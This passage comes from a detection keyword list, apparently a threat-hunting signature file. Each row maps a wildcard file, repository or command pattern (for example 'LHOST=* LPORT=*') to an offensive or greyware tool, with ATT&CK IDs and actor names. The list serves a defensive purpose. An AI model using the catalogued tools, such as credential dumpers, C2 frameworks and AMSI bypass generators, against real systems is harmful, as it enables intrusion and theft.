APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*ldapsigncheck.x86.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*LDAPWordlistHarvester.ps1*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester.py*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - 
T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester-main*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*ldd2bloodhound*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*ldeep cache *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep ldap -u *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep*activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep*ldap_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 
T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep_dump_users_enabled.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep_dump_users_enabled.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*ldeep_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ldif2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ldifde.exe -f *\temp\*.txt -p subtree*","greyware_tool_keyword","ldifde","using ldifde.exe to export data from Active Directory to a .txt file in the Temp directory","T1018 - T1005 - T1077.001","TA0007 - TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*leaky/leakbuf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*leapsecurity*","offensive_tool_keyword","Github Username","github repo name hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/leapsecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*legalhackers.com/exploits/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*lejgfmmlngaigdmmikblappdafcmkndb*","greyware_tool_keyword","uVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*lem0nSec/ShellGhost*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*lengjibo/FourEye*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*Leo4j/Invoke-SMBRemoting*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*LetMeOutSharp.*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*LFI scanner checks.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*lgandx/Pcredz*","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*LHOST=* LPORT=*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LHOST=0.tcp.ngrok.io*","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*liamg/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*lib/Bruteforcer.cs*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*lib/ForgeTicket.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*lib/S4U.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*LibcRealpathBufferUnderflow/RationalLove.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*libFuzzer-HOWTO.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 
- T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*libnspr_nspr_log_file_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*libreoffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libs/bofalloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*libs/bofentry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*libs/bofhelper*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*LibSnaffle.ActiveDirectory*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*LibSnaffle.FileDiscovery*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" 
+"*libSSH-Authentication-Bypass*","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z" +"*libwireshark16*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libwireshark-data*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libwireshark-dev*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libwiretap13*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*libxpc_mitm_ssudo.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*libxselinux.old*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*libxselinux.so*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - 
T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*lightsout.py*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*LightsOut-master.zip*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*ligolo.lan*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo_darwin*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety 
(TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo_linux*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo_windows*.exe*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo-master*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*ligolo-ng -selfcert*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*LinEnum.sh*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - 
T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*LinEnum-master.ip*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*link_tcp 127.0.0.1 *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*linkedin2username.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - 